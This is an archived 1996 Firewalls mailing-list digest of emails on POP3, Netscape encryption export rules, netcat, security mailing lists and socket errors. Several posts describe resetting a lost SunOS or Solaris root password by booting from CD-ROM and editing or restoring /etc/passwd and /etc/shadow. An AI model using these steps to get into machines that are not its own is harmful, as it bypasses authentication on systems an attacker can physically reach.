(Grosses-Raetsel-Tor.GeNUA.DE [193.141.169.26]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id FAA16279 for ; Thu, 18 Jul 1996 05:02:08 -0700 (PDT) Received: (from smap@localhost) by Grosses-Raetsel-Tor.GeNUA.DE (8.6.12/8.6.12) id NAA09422; Thu, 18 Jul 1996 13:59:05 +0200 Received: from auryn.genua.de(192.109.217.42) by Grosses-Raetsel-Tor.GeNUA.DE via smap (V1.3) Received: from auryn.genua.de (localhost [127.0.0.1]) by auryn.genua.de (8.7.4/8.7.3) with ESMTP id NAA29706; Thu, 18 Jul 1996 13:58:45 +0200 (MET DST) Message-Id: <199607181158.NAA29706@auryn.genua.de> To: "A. Ian Vogelesang" cc: Firewalls@greatcircle.com Subject: Patch removes POP3 users from /etc/passwd MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-ID: <29703.837691124.1@auryn.genua.de> Date: Thu, 18 Jul 1996 13:58:44 +0200 From: Bernhard Schneck Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Modifications to Sendmail, local delivery, popper, and poppassd > have been developed to move POP3 users out of /etc/passwd, and > to run local delivery and popper retrieval under a no-priviledge > uid. I think (without looking too closely at Ian's stuff) that something similar has been available since 1993 (or earlier?) in the MH package (originally the RAND Mail Handler, by Marshall T. Rose, later versions from UCI and lots of other places. The Only Real Mail Handler :-). Take a look at spop. \Bernhard. PS: There's no need to hack sendmail (but maybe some fun?) PPS: What does this have to do with Firewalls? From firewalls-owner Thu Jul 18 05:33:38 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA17279 for firewalls-outgoing; Thu, 18 Jul 1996 05:29:16 -0700 (PDT) Received: from habanero.jmu.edu (habanero.jmu.edu [134.126.70.210]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id FAA17254; Thu, 18 Jul 1996 05:29:09 -0700 (PDT) Message-Id: <199607181229.FAA17254@miles.greatcircle.com> Received: by habanero.jmu.edu Date: Thu, 18 Jul 1996 08:25:21 -0400 From: gary flynn To: dufresne@winternet.com, firewalls-owner@GreatCircle.COM Subject: Re: RC4-128bit encryption for Netscape available Cc: Firewalls@GreatCircle.COM, bill.stout@hidata.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > On Wed, 17 Jul 1996, Bill Stout wrote: > > >> You all probably know this by now, but yesterday Netscape announced > >> availability of downloadable RC4-128bit encryption Server and Browser > >> products to U.S. customers. > > >> http://www.netscape.com/ > > > Yes, but as of about 20 mins ago, the download process for these products > > was not functioning... > > i wonder how secure it is? i know it checks street addresses and the > like, but couldnt this be faked? also how does the (i assume) ftp > server know that you are valid? or does it download via http? > > Matt Either the government is even more technologically inept than I thought, or Netscape really pulled one over on them. There's no way this provides any control over the code. Whats to stop someone in-country from putting up a gateway or simply sucking it down and making it generally available. What a waste of taxpayer money. From firewalls-owner Thu Jul 18 06:33:55 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA20948 for firewalls-outgoing; Thu, 18 Jul 1996 06:28:23 -0700 (PDT) Received: from aia04.aia.af.mil ([137.242.150.4]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id GAA20941 for ; Thu, 18 Jul 1996 06:28:07 -0700 (PDT) Received: by aia04.aia.af.mil (SMI-8.6/SMI-SVR4) Date: Thu, 18 Jul 1996 08:25:03 -0500 From: rmcdermo@aia04.aia.af.mil (CSC Bob McDermott) Message-Id: <199607181325.IAA03419@aia04.aia.af.mil> To: Firewalls@GreatCircle.COM Subject: Re: Firewalls-Digest V5 #423 Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-MD5: VhObZHVergFnKpxsCAfKBA== Sender: firewalls-owner@GreatCircle.COM Precedence: bulk oops, the previous message I sent you was for SunOS 4.1.X, for Solaris 2.4 after you boot off the cdrom and mount your disk's root file system copy over the files /etc/password and /etc/shadow onto your hard drive. If you mounted your drive's root filesystem as /mnt then copy the above files to /mnt/etc/password and /mnt/etc/shadow. Good Luck again, Ken From firewalls-owner Thu Jul 18 06:52:36 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA20812 for firewalls-outgoing; Thu, 18 Jul 1996 06:25:38 -0700 (PDT) Received: from aia04.aia.af.mil ([137.242.150.4]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id GAA20805 for ; Thu, 18 Jul 1996 06:25:32 -0700 (PDT) Received: by aia04.aia.af.mil (SMI-8.6/SMI-SVR4) Date: Thu, 18 Jul 1996 08:21:35 -0500 From: rmcdermo@aia04.aia.af.mil (CSC Bob McDermott) Message-Id: <199607181321.IAA03416@aia04.aia.af.mil> To: Firewalls@GreatCircle.COM Subject: Re: Firewalls-Digest V5 #423 Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-MD5: 3KakVhb3wjo43kxMctfeSQ== Sender: firewalls-owner@GreatCircle.COM Precedence: bulk First, reboot your computer from the SunOS cdrom by typing "boot cdrom" from the boot prompt. Second, exit the installation program. Third, mount the root filesystem on your hard drive by typing "mount /dev/rsd# /mnt" Fourth, edit the /mnt/etc/passwd file and delete the encrypted password for root. Finally, reboot your computer. When you login as root, the system will ask you for a new password. Good luck, Ken From firewalls-owner Thu Jul 18 07:00:22 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA20690 for firewalls-outgoing; Thu, 18 Jul 1996 06:22:01 -0700 (PDT) Received: from homeport.org (lighthouse.homeport.org [205.136.65.198]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id GAA20672 for ; Thu, 18 Jul 1996 06:21:52 -0700 (PDT) Received: (adam@localhost) by homeport.org (8.6.9/8.6.9) id JAA08499; Thu, 18 Jul 1996 09:23:40 -0500 From: Adam Shostack Message-Id: <199607181423.JAA08499@homeport.org> Subject: Re: Netcat To: jwb@xioa.cosmic.org (Joe Beiter) Date: Thu, 18 Jul 1996 09:23:39 -0500 (EST) Cc: Firewalls@GreatCircle.COM In-Reply-To: <199607171302.NAA06134@xioa.cosmic.org> from "Joe Beiter" at Jul 17, 96 01:02:09 pm X-Mailer: ELM [version 2.4 PL24 ME8b] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Joe Beiter wrote: | Does anyone have any feelings on using netcat to create "pipes" through | a firewall situation to port in things like news? We are using two ciscos | with a dmz area between them. on't compile with -DGAPING_SECURITY_HOLE. :) After that, why would you prefer nc to plug-gw? nc would need to combine with tcpd to get the netacl abilities of plug-gw, and doesn't log. So I don't see what you stand to gain, and do see it as more work for less capabilities. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From firewalls-owner Thu Jul 18 07:03:56 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA21786 for firewalls-outgoing; Thu, 18 Jul 1996 06:46:26 -0700 (PDT) Received: from LIVEDGAR.gsionline.com (livedgar.gsionline.com [204.254.209.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id GAA21773 for ; Thu, 18 Jul 1996 06:46:19 -0700 (PDT) Received: from [204.254.209.10] by LIVEDGAR.gsionline.com (NTMail 3.02.04) id oa011740; Thu, 18 Jul 1996 09:43:15 -0400 X-Sender: nbk@livedgar X-Mailer: Windows Eudora Version 1.4.3 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Michael Dillon From: nkeenan@gsionline.com (Nick Keenan) Subject: Re: More hacker info from Forbes Cc: firewalls@GreatCircle.COM Date: Thu, 18 Jul 1996 09:43:15 -0400 Message-Id: <13431572604594@gsionline.com> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > >Has anybody read this Forbes article? > >http://www.forbes.com/asap/6396/hack.htm > Hmm. It seems like these kids pulled the wool over the reporter's eyes pretty good. From firewalls-owner Thu Jul 18 07:18:44 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA22196 for firewalls-outgoing; Thu, 18 Jul 1996 06:53:13 -0700 (PDT) Received: from Concord01.POP.InterNex.Net (Concord01.POP.InterNex.Net [205.158.3.82]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id GAA22187 for ; Thu, 18 Jul 1996 06:53:05 -0700 (PDT) Message-Id: <199607181353.GAA22187@miles.greatcircle.com> Received: from [205.158.182.130] by Concord01.POP.InterNex.Net Subject: Re: CERT Advisories (was: Re: Dirty dogs) Date: Thu, 18 Jul 96 06:49:41 -0800 x-sender: INX-10108b@Concord01.POP.InterNex.Net x-mailer: Claris Emailer 1.1 From: Bill Husler To: Mime-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >Received: 7/17/96 7:04 AM >From: David J. Meltzer, davem@iss.net > > There are several mailing lists that >are commonly used by security professionals to initially report problems >(Bugtraq, Best of Security, Linux Security, Freebsd Security, etc.), and it >is vital that any security administrator stays current with anything relevant >being posted to these. I am interested in finding out more about these mailing lists. Do have more information on them? Is there a reference site someware that discusses what mailing lists are available to Security professionals for these sorts of reportings and alerts? Thanks, Bill From firewalls-owner Thu Jul 18 07:33:54 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA21851 for firewalls-outgoing; Thu, 18 Jul 1996 06:47:37 -0700 (PDT) Received: from hqmail.usda.gov ([199.128.3.90]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id GAA21811 for ; Thu, 18 Jul 1996 06:47:25 -0700 (PDT) Received: by hqmail.usda.gov Date: Thu, 18 Jul 1996 9:42:00 -0400 From: "Hassan Karim" Message-Id: <31EE5171.1DBD.438C.000@MHS> Subject: Hostile attack (was Dirty Dogs) To: firewalls@GreatCircle.COM (Receipt Notification Requested) X400-Mts-Identifier: [ /P=GOV+USDA/A=ATTMAIL/C=US/ ; 31EE5171.1DBD.438C.000 ] X-Mailer: Worldtalk (4.0.2-p8)/STREAM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I would perceive it as hostile but not really be too concerned because you weren't successful. However if you had been successful then the proper legal actions would have been taken. and since I work for the government, I think I would have had to involve the Secret Service or other White House Security. >>> firewalls-owner@GreatCircle.COM@i 07/12/96 06:38pm >>> Precedence: bulk On Fri, 12 Jul 1996, Matthew Keenan wrote: > and try snmp probing the routers closest to the target address. Querying whois and dns is one thing, but some sites might conceive your probing their routers as hostile action. For the list: Would you? Would you detect it? ;) Cheers. - PS -- Ng Pheng Siong * Finger for PGP key. Pacific Internet Pte Ltd * Singapore Fast, secure, cheap. Pick two. From firewalls-owner Thu Jul 18 07:42:11 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA22355 for firewalls-outgoing; Thu, 18 Jul 1996 06:54:55 -0700 (PDT) Received: from telxon (telxon.mis.telxon.com [149.23.2.4]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id GAA22328 for ; Thu, 18 Jul 1996 06:54:38 -0700 (PDT) Received: from sbridg.mis.telxon.com by telxon (SMI-8.6/SMI-SVR4) Received: from Connect2 Message Router by sbridg.mis.telxon.com Message-ID: <9E199D6001DA0000@sbridg.mis.telxon.com> Date: Thu, 18 Jul 96 9:53:00 -0400 From: "Wojno, Jim" Organization: Telxon To: firewalls@greatcircle.com (Firewalls) Subject: RE: [HELP] I lost root password! MIME-Version: 1.0 Content-type: text/plain; charset="US-ASCII" Content-transfer-encoding: 7BIT X-mailer: Connect2-SMTP 4.00 MHS to SMTP Gateway Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >>Someone broken my root password! >> >>I use solaris 2.4, when i used sun os 4.1.3 i can modify root password by >>single user mode booting.. >e) edit to /etc/passwd file and remove the root password This will not work on Solaris, only SunOS 4.1.X. Starting with Solaris 2.1, the encrypted passwords are not stored in /etc/passwd, as this is a globally readable file. (As such, vulnerable to crack, and other password cracking programs). The encrypted password is now stored in /etc/shadow, which only root can read. An edit to the /etc/passwd file will invalidate the file without performing a "pwconv" to rebuild the /etc/shadow file. Unfortunately, there is no command line modifier for pwconv to specify which shadow file to rebuild. Since /etc in this case is *not* the /etc you want to change, editing will not solve the problem. My suggestion is that after booting the CD into single user mode, and mounting the root partition, use ufsrestore to restore *both* the /etc/passwd, and the /etc/shadow files from a known good backup tape. This will restore the root password to what it was before the change. Once done, reboot and change the password to whatever you like. The only possible problem is that if any other passwords were legitimately changed between the time of the backup and the time of the restore, those passwords will now be what they were at the time the backup was made. If this is a major problem, you might be able to restore both /etc/passwd and /etc/shadow to a temp area, then replace only the root entries in the current files with the entries in the restored files. Please note that while I have been successful in restoring the full /etc/passwd and /etc/shadow file for similar situations, I haven't tried replacing individual lines. It should work, but I can't be 100% sure of this, as I have never done it. Jim Wojno Systems Administrator Telxon Corporation jwojn@telxon.com From firewalls-owner Thu Jul 18 08:19:49 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA02456 for firewalls-outgoing; Thu, 18 Jul 1996 08:15:42 -0700 (PDT) Received: from london.micrognosis.com (midas.london.micrognosis.com [193.114.123.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id IAA02435 for ; Thu, 18 Jul 1996 08:15:29 -0700 (PDT) Received: by london.micrognosis.com (4.1/NAR-Gateway) Received: from zeus.london.micrognosis.com(192.83.165.17) by midas via smap (V1.0mjr) Received: from moria by zeus.london.micrognosis.com (4.1/SMI-4.1) From: nreadwin@london.micrognosis.com (Neil Readwin) Received: by moria Message-Id: <9607181511.AA03314@moria> Subject: Re: CERT Advisories (was: Re: Dirty dogs) To: Bill@Husler.xo.com (Bill Husler) Date: Thu, 18 Jul 1996 16:11:37 +0100 (BST) Cc: firewalls@GreatCircle.COM In-Reply-To: <199607181353.GAA22187@miles.greatcircle.com> from "Bill Husler" at Jul 18, 96 06:49:41 am X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > I am interested in finding out more about these mailing lists. http://iss.net/sec_info/maillist.html has charters and subscription details for most of them. -- "So you could say the greatest achievement of the Internet is that it turns nuclear war into nothing more than a series of routing errors." -- Mark Pesce From firewalls-owner Thu Jul 18 09:23:13 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA06918 for firewalls-outgoing; Thu, 18 Jul 1996 09:06:31 -0700 (PDT) Received: from scruz.net (nic.scruz.net [165.227.1.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id JAA06910 for ; Thu, 18 Jul 1996 09:06:21 -0700 (PDT) Received: from histar2.bgsm.edu by scruz.net (8.7.3/1.34) Message-ID: <31EE8A29.750F083D@ezunx.com> Date: Thu, 18 Jul 1996 12:02:01 -0700 From: raf X-Mailer: Mozilla 2.01 (X11; I; Linux 1.2.13 i486) MIME-Version: 1.0 To: firewalls@greatcircle.com Subject: bind address already in use Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I know I have seen this before, in regards to INETD and use of TCP wrappers, what would cause the errors in bind??? We are getting strange errors since putting in tcpd and connections are not quite working. The weird this is, we pulled tcpd out and are still getting the same error. this is on solaris 2.4 thanks, rich From firewalls-owner Thu Jul 18 09:38:28 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA06899 for firewalls-outgoing; Thu, 18 Jul 1996 09:06:12 -0700 (PDT) Received: from dsacg1.dsac.dla.mil (dsacg1.dsac.dla.mil [131.78.1.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id JAA06892 for ; Thu, 18 Jul 1996 09:06:03 -0700 (PDT) Received: by dsacg1.dsac.dla.mil (1.38.193.5/1.40 (DSDC Columbus DSDCG1)) From: nto2584@dsacg1.dsac.dla.mil (Steven C. Payne) Message-Id: <9607181601.AA19993@dsacg1.dsac.dla.mil> Subject: Re: your problems..... To: cyber@ipsiss.demon.co.uk Date: Thu, 18 Jul 96 12:01:11 EDT Cc: firewalls@greatcircle.com In-Reply-To: <199607181208.MAA00318@ipsiss.demon.co.uk>; from "CyberJunkie" at Jul 18, 96 12:08 (noon) Mailer: Elm [revision: 70.85.2.1] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I hope I am not offending the group, but this was interesting. > > Hello steven, > I hope this mails doesnt come accross as arrogant, as that isnt intended. > You say that you have lost root to some unknown individual(s). Considering > your os, im not very suprised. Crashing your machine however is another > matter. I am a hacker, in that i enjoy exploring computer systems and > operating systems. I do not condone however the actions of individuals, > calling themselves hackers that disrupt and damage systems. Infact I personaly > abhore these individuals. If you are still experiencing problems, and would > like someone to take a look at the general security of your system, i would be > glad too. I can also find out who is attacking your system, and try to have > words with them. I will not however supply names to the authorities. > Good luck, > Hope to hear from you, > > Cyberjunkie > > p.s. I seriously recomend upgrading your operating system > dear cyberjunkie, first off, your mail doesn't come across as arrogant, only misinformed. It is NOT ME who has a problem, I was answering a msg posted by someone else. If you in fact consider yourself a "hacker" you should have read the ENTIRE SMTP headers and you would see the thread I was answering was not mine, additionally, whether you condone hacking or not, it happens. Be it a "bona-fide" user of systems who is just curious, (alot of bugs have been discovered by people who don't always have malicious intents, as well as they may not know what ramifications they have just discovered), as well as a malicious hacker worming his way in through exploitation of some known but unplugged hole. Bottom line is hacking happens and policing it is very difficult, proving it is more so. I know if/when I catch someone they get one warning, if it continues (questionable acts) out their account goes PERIOD. This is for bona-fide users. As far as ME letting YOU look at the security of MY system(s), (do I have a tag on that says MORON?) I don't think so, thank you very much. Reporting to authorities: This is where you and I differ, I WOULD supply names to the OSI, or any other office that requests is, as well as my local SECURITY office, I would also supply any pertitnent info, I already have done this NUMEROUS times to the ASSIST, OSI, etc.. I would not deal with the individual unless I could deduce that it was an inadvertant accident, or just a novice user doing something stupid. (This does happen and it can be an honest mistake). As for upgrading my OS, I don't think so, I am very comfortable with the bugs I currently have, rather than learn a whole bunch of new ones again, I don't think so I don't really ENJOY exploring computer system, or OS's, I use them as I would a screwdriver; a TOOL, nothing more, nothing less. I have to support many OS's, (unices, NT, windoze, etc), I need to understand how they interoperate and what marrige works best for our environment because no ONE OS is going to cover everything. I ENJOY riding my motorcycle in the dirt but that's a different story..... take care spayne From firewalls-owner Thu Jul 18 09:41:37 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA07472 for firewalls-outgoing; Thu, 18 Jul 1996 09:23:24 -0700 (PDT) Received: from gw.lsli.com (gw.lsli.com [206.50.87.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id JAA07461 for ; Thu, 18 Jul 1996 09:23:12 -0700 (PDT) Received: by gw.lsli.com (AIX 3.2/UCB 5.64/4.03) Received: by lsli.com via smwrap Version 2.2 Message-Id: <31EE63BD.66A9@lsli.com> Date: Thu, 18 Jul 1996 11:18:05 -0500 From: Livermore Software Reply-To: portusinfo@lsli.com Organization: Livermore Software Laboratories, Intl. Mime-Version: 1.0 To: firewalls@greatcircle.com Subject: ANNOUNCE: PORTUS Version 2.2 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Livermore Software is pleased to announce the 2.2 release of its PORTUS Application Firewall. For more information please contact LSLI. -- Livermore Software Laboratories, Intl. 2825 Wilcrest, Suite 160 Houston, Texas 77042-3358 vox: 713 974 3274 fax: 713 978 6246 portusinfo@lsli.com http://www.lsli.com From firewalls-owner Thu Jul 18 10:07:57 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA08402 for firewalls-outgoing; Thu, 18 Jul 1996 09:41:33 -0700 (PDT) Received: from ipi.smoothmove.com ([204.119.61.99]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id JAA08348 for ; Thu, 18 Jul 1996 09:41:06 -0700 (PDT) Received: from uncle (uncle.smoothmove.com [204.119.61.101]) by ipi.smoothmove.com (8.7.1/8.7.1) with SMTP id KAA11448; Thu, 18 Jul 1996 10:07:17 -0700 Received: by uncle with Microsoft Mail Message-ID: <01BB748C.8162CD40@uncle> From: Jonathan Eggert To: Ron DuFresne Cc: "bill.stout@hidata.com" Subject: RE: RC4-128bit encryption for Netscape available Date: Thu, 18 Jul 1996 09:35:48 -0700 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Here is a little info about the Netscape's use of the 128 bit encryption. This is cut and pasted from Edupage. Jon. U.S. GOV'T APPROVES ONLINE ENCRYPTION TOOL DISTRIBUTION The U.S. government has okayed Netscape Communications' plan to distribute its powerful 128-bit encryption software via the Internet, as long as it's sent only to U.S. citizens. Currently, the company has to ship the software via snail mail. Under the government's terms, Netscape must use a database to verify the names and addresses of people who want to download the software and ask them to sign affidavits stating they are U.S. citizens. Netscape says its 128-bit encryption software requires 309 septillion more times computing power to break the encryption code than its 40-bit version. (Wall Street Journal 16 Jul 96 B2) Edupage is written by John Gehl & Suzanne Douglas . Voice: 404-371-1853, Fax: 404-371-8057. Technical support is provided by Information Technology Services at the University of North Carolina at Chapel Hill. *************************************************************** Edupage ... is what you've just finished reading. To subscribe to Edupage: send mail to: listproc@educom.unc.edu with the message: subscribe edupage Jean de Lattre de Tassigny (if your name is Jean de Lattre de Tassigny; otherwise, substitute your own name). ... To cancel, send a message to: listproc@educom.unc.edu with the message: unsubscribe edupage. (If you have subscription problems, send mail to manager@educom.unc.edu.) Educom Review ... is our bimonthly print magazine on information technology and education ... Sample Subscriber Testimonial: "After reading Edupage for the last year or so, I recently subscribed to Educom Review. Your magazine is one of the most lucid and informative resources on the field I've found." ... Subscriptions are $18 a year in the U.S.; send mail to offer@educom.edu. When you do, we'll ring a little bell, because we'll be so happy! Choice of bell is yours: a small dome with a button, like the one on the counter at the dry cleaners with the sign "Ring bell for service"; or a small hand bell; or a cathedral bell; or a door bell; or a chime; or a glockenspiel. Your choice. But ring it! Educom Update ... is our twice-a-month electronic summary of organizational news and events. To subscribe, send mail to: listproc@educom.unc.edu with the message: subscribe update Georges Clemenceau (if your name is Georges Clemenceau ; otherwise, substitute your own name). Archives & Translations ... Edupage is translated into Chinese, French, German, Hebrew, Hungarian, Italian, Lithuanian, Portuguese, Romanian, Slovak and Spanish. For translations and archives, see < http://www.educom.edu/ >. Or send mail to translations@educom.unc.edu for info on subscribing to any of these translations. Today's Honorary Subscribers ... Jean de Lattre de Tassigny (1889-1952) was commander-in-chief of the French Army in 1945; Georges Clemenceau (1841-1929) was a French statesman, author, journalist, physician, playwright, educator, and one of the architects of the Treaty of Versailles signed in 1919. ******************************************************************* Educom -- Transforming Education Through Information Technology ******************************************************************* ---------- From: Matthew Keenan[SMTP:matt@firstpac.com.au] Sent: Thursday, July 18, 1996 5:53 AM To: Ron DuFresne Cc: bill.stout@hidata.com; Firewalls@GreatCircle.COM Subject: Re: RC4-128bit encryption for Netscape available Ron DuFresne wrote this... > On Wed, 17 Jul 1996, Bill Stout wrote: >> You all probably know this by now, but yesterday Netscape announced >> availability of downloadable RC4-128bit encryption Server and Browser >> products to U.S. customers. >> http://www.netscape.com/ > Yes, but as of about 20 mins ago, the download process for these products > was not functioning... i wonder how secure it is? i know it checks street addresses and the like, but couldnt this be faked? also how does the (i assume) ftp server know that you are valid? or does it download via http? Matt -- Matthew Keenan Network Administrator First Pacific Stockbrokers Sydney, Australia From firewalls-owner Thu Jul 18 10:21:51 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA09383 for firewalls-outgoing; Thu, 18 Jul 1996 09:56:44 -0700 (PDT) Received: from dtcro002.apogee-com.fr (firewall.apogee-com.fr [194.2.187.130]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id JAA09374 for ; Thu, 18 Jul 1996 09:56:36 -0700 (PDT) Received: by dtcro002.apogee-com.fr; id SAA23239; Thu, 18 Jul 1996 18:51:06 +0200 (MET DST) Received: from dtcxs001.apogee-com.fr(10.129.16.1) by firewall.apogee-com.fr via smap (V3.1.1) Received: from LCHE.apogee-com.fr (ingpc003.apogee-com.fr) by dtcxs001.apogee-com.fr (4.1/SMI-4.1) Message-Id: <31EE6B2C.12F@apogee-com.fr> Date: Thu, 18 Jul 1996 18:49:48 +0200 From: Jean-Francois Zwobada Organization: APOGEE Communications X-Mailer: Mozilla 2.02 (Win95; I) Mime-Version: 1.0 To: PCA Cc: firewalls@greatcircle.com Subject: Re: CCMAIL MOBILE References: <2.2.32.19960718014011.006bed84@204.243.240.5> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk This is a great problem. I solved one case with a tcp_wrapper invoking a ftp proxy or a tcprelay depending on the IP address, but the case was easy to solve since the CCRouters were clearly identified (inside and outside). Regards, Jean-Francois -- ______________________ Jean-Francois Zwobada ____________________ Apogee Communications Tel : +33 (1) 69 85 56 47 Parc Club Orsay Universite Fax : +33 (1) 69 85 56 48 28, rue Jean Rostand 91893 ORSAY Cedex e-mail : zwobada@apogee-com.fr __________________________________________________________________ From firewalls-owner Thu Jul 18 10:38:47 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA10781 for firewalls-outgoing; Thu, 18 Jul 1996 10:15:09 -0700 (PDT) Received: from dtcro002.apogee-com.fr (firewall.apogee-com.fr [194.2.187.130]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id KAA10773 for ; Thu, 18 Jul 1996 10:15:01 -0700 (PDT) Received: by dtcro002.apogee-com.fr; id TAA23380; Thu, 18 Jul 1996 19:09:35 +0200 (MET DST) Received: from dtcxs001.apogee-com.fr(10.129.16.1) by firewall.apogee-com.fr via smap (V3.1.1) Received: from LCHE.apogee-com.fr (ingpc003.apogee-com.fr) by dtcxs001.apogee-com.fr (4.1/SMI-4.1) Message-Id: <31EE6F79.A4D@apogee-com.fr> Date: Thu, 18 Jul 1996 19:08:09 +0200 From: Jean-Francois Zwobada Organization: APOGEE Communications X-Mailer: Mozilla 2.02 (Win95; I) Mime-Version: 1.0 To: raf Cc: firewalls@greatcircle.com Subject: Re: bind address already in use References: <31EE8A29.750F083D@ezunx.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk When you strongly kill a process, it happens the process don't close a file descriptor correctly. When this fd is associated to a socket, the port won't be release before an hour or so... I don't remember the variable associated to the timer involved... "Bind: address already in use" means your process wants to open a socket as a server on a port already opened by another process (or not correctly released, as mentioned above). Jean-Francois -- ______________________ Jean-Francois Zwobada ____________________ Apogee Communications Tel : +33 (1) 69 85 56 47 Parc Club Orsay Universite Fax : +33 (1) 69 85 56 48 28, rue Jean Rostand 91893 ORSAY Cedex e-mail : zwobada@apogee-com.fr __________________________________________________________________ From firewalls-owner Thu Jul 18 11:18:22 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA15127 for firewalls-outgoing; Thu, 18 Jul 1996 10:53:37 -0700 (PDT) Received: from team-alpha.icn-inc.net (team-alpha.icn-inc.net [206.105.108.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id KAA15007 for ; Thu, 18 Jul 1996 10:52:53 -0700 (PDT) Received: from team-alpha.icn-inc.net (port11.icn-inc.net [206.105.108.11]) by team-alpha.icn-inc.net (8.6.11/8.6.9) with SMTP id OAA25003 for ; Thu, 18 Jul 1996 14:17:56 -0400 Message-ID: <31EE7AC1.62E0@icn-inc.net> Date: Thu, 18 Jul 1996 13:56:17 -0400 From: Andrew Worrall Organization: US Customs X-Mailer: Mozilla 2.01 (Win95; U) MIME-Version: 1.0 To: Firewalls@GreatCircle.COM Subject: Network Security Magazines? Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Are there any magazines/publications that are specific to network security? I've searched in several stores with no luck. If there are such magazines, a name of the magazine or Web address would be very helpful. Thanks A Worrall From firewalls-owner Thu Jul 18 11:25:41 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA13834 for firewalls-outgoing; Thu, 18 Jul 1996 10:44:30 -0700 (PDT) Received: from mailbox.neosoft.com (mailbox.neosoft.com [206.109.1.16]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id KAA13795 for ; Thu, 18 Jul 1996 10:44:14 -0700 (PDT) Received: from fw.nmti.com (fw.baileynm.com [206.109.159.11]) by mailbox.neosoft.com (8.7.5/8.7.3) with SMTP id MAA05824; Thu, 18 Jul 1996 12:41:09 -0500 (CDT) Received: from web.nmti.com(198.178.0.201) by fw.nmti.com via smap (V1.3) Received: from sonic.nmti.com (peter@sonic.nmti.com [198.178.0.2]) by web.nmti.com (8.6.12/8.6.9) with SMTP id KAA13746; Thu, 18 Jul 1996 10:33:36 -0500 Received: by sonic.nmti.com; id AA18361; Thu, 18 Jul 1996 10:33:35 -0500 From: peter@baileynm.com (Peter da Silva) Message-Id: <9607181533.AA18361@sonic.nmti.com.nmti.com> Subject: Re: [HELP] I lost root password! To: pera@medcom.se Date: Thu, 18 Jul 1996 10:33:35 -0500 (CDT) Cc: Firewalls@GreatCircle.COM In-Reply-To: <31EE2C08.2CCA@medcom.se> from "P=?iso-8859-1?Q?=E4r Ahr=E9?=n" at Jul 18, 96 01:20:24 